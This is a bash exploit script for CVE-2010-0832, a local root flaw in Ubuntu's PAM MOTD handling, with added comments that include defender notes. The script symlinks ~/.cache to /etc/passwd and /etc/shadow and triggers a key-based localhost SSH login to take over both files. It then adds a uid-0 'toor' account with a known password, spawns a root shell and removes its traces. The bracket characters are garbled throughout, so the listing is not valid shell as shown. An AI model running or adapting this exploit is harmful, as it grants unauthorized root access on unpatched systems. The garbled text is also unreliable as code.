#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
#   user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
#   [*] Ubuntu PAM MOTD local root
#   [*] Backuped /home/user/.ssh/authorized_keys
#   [*] SSH key set up
#   [*] Backuped /home/user/.cache
#   [*] spawn ssh
#   [+] owned: /etc/passwd
#   [*] spawn ssh
#   [+] owned: /etc/shadow
#   [*] Restored /home/user/.cache
#   [*] Restored /home/user/.ssh/authorized_keys
#   [*] SSH key removed
#   [+] Success! Use password toor to get root
#   Password:
#   root@ubuntu:/home/user# id
#   uid=0(root) gid=0(root) groupes=0(root)
#
# Account records the script later appends to the system account databases:
# P is a passwd-format line for a second uid-0/gid-0 account named "toor";
# S is the matching shadow-format line carrying a $6$ (SHA-512 crypt) hash.
# Defender note: any uid-0 entry other than root in /etc/passwd is a strong
# indicator of compromise and is worth alerting on.
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "***91;****93; Ubuntu PAM MOTD local root"
# Preconditions: ssh and ssh-keygen must be found by `which`, and `ps -u root`
# must list an sshd process; otherwise the script prints a message and exits 1.
# NOTE(review): the ***91; / ***93; sequences on these lines are page-extraction
# residue, so the listing is not valid shell as shown.
***91; -z "$(which ssh)" ***93; && echo "***91;-***93; ssh is a requirement" && exit 1
***91; -z "$(which ssh-keygen)" ***93; && echo "***91;-***93; ssh-keygen is a requirement" && exit 1
***91; -z "$(ps -u root |grep sshd)" ***93; && echo "***91;-***93; a running sshd is a requirement" && exit 1
# Moves the path in $1 aside to "$1.bak" so it can be put back later.
# Arguments: $1 - file or directory to set aside
# Returns:   0 if $1 does not exist or was moved; 1 if the mv fails
backup() {
# An existing "$1.bak" is deleted recursively first, so any earlier backup
# of the same path is lost.
***91; -e "$1" ***93; && ***91; -e "$1".bak ***93; && rm -rf "$1".bak
# Nothing to back up.
***91; -e "$1" ***93; || return 0
mv "$1"{,.bak} || return 1
echo "***91;****93; Backuped $1"
}
# Puts "$1.bak" back in place of $1, undoing backup().
# Arguments: $1 - path whose ".bak" copy should be reinstated
# Returns:   0 if there is no "$1.bak" or it was moved back; 1 if the mv fails
restore() {
# Whatever currently sits at $1 is removed recursively, even when no
# backup exists to replace it.
***91; -e "$1" ***93; && rm -rf "$1"
***91; -e "$1".bak ***93; || return 0
mv "$1"{.bak,} || return 1
echo "***91;****93; Restored $1"
}
# Generates a throwaway SSH key pair and installs its public half as the
# invoking user's only authorized key.
# Globals: KEY (read) - path of the private key file
# Returns: 1 if key generation, mkdir or the final mv fails
key_create() {
# The user's real authorized_keys is moved to authorized_keys.bak.
backup ~/.ssh/authorized_keys
# Passphrase-less RSA key (-N '') carrying the comment "pam".
ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
***91; ! -d ~/.ssh ***93; && { mkdir ~/.ssh || return 1; }
# Defender note: while the script runs, authorized_keys holds a single key
# commented "pam" next to an authorized_keys.bak file; both remain on disk
# if the run is interrupted before key_remove().
mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
echo "***91;****93; SSH key set up"
}
# Cleanup counterpart of key_create(): deletes the temporary private key and
# reinstates the user's original authorized_keys from its .bak copy.
# Globals: KEY (read) - path of the private key file
key_remove() {
rm -f "$KEY"
restore ~/.ssh/authorized_keys
echo "***91;****93; SSH key removed"
}
# Replaces ~/.cache with a symlink to the file named by $1, opens a
# key-authenticated SSH session to localhost that only runs `true`, and then
# checks whether $1 has become writable by the invoking user.
# Arguments: $1 - path of the target file
# Globals:   KEY (read) - private key used for the localhost login
# Returns:   1 if the symlink cannot be created; exits via bye() if $1 is
#            not writable afterwards
# NOTE(review): per the header (CVE-2010-0832) it is the login itself that
# changes ownership of the symlink target - presumably through pam_motd
# handling ~/.cache as root; confirm against the advisory.
# Defender note: a ~/.cache that is a symlink to a file outside the home
# directory, or /etc/passwd or /etc/shadow not owned by root, are the
# artifacts of this step. The fix is the libpam update in the header's
# Patch Instructions.
own() {
***91; -e ~/.cache ***93; && rm -rf ~/.cache
ln -s "$1" ~/.cache || return 1
echo "***91;****93; spawn ssh"
# Host-key checking is disabled for localhost so the login does not prompt.
ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
***91; -w "$1" ***93; || { echo "***91;-***93; Own $1 failed"; restore ~/.cache; bye; }
echo "***91;+***93; owned: $1"
}
# Failure exit path: removes the temporary key, restores authorized_keys,
# then terminates the script with status 1.
bye() {
key_remove
exit 1
}
# Main sequence. `mktemp -u` only prints an unused name without creating the
# file; ssh-keygen creates it later in key_create().
KEY="$(mktemp -u)"
key_create || { echo "***91;-***93; Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "***91;-***93; Failed to backup ~/.cache"; bye; }
# After each own() succeeds, the prepared "toor" record is appended to the
# corresponding account database.
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "***91;-***93; Failed to restore ~/.cache"; bye; }
key_remove
echo "***91;+***93; Success! Use password toor to get root"
# The su command string runs as "toor" (uid 0 per $P). It deletes every line
# matching "toor:" from both files, sets their owner back to root and the
# group of /etc/shadow to shadow, invalidates the nscd passwd cache (errors
# discarded), and then starts bash.
# Defender note: because the added account and the ownership change are
# reverted here, inspecting the final state of /etc/passwd and /etc/shadow can
# miss this activity. Change auditing or file-integrity monitoring on those
# two files is more reliable, as is log review for a key-based localhost SSH
# login followed by su to an unfamiliar uid-0 account.
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor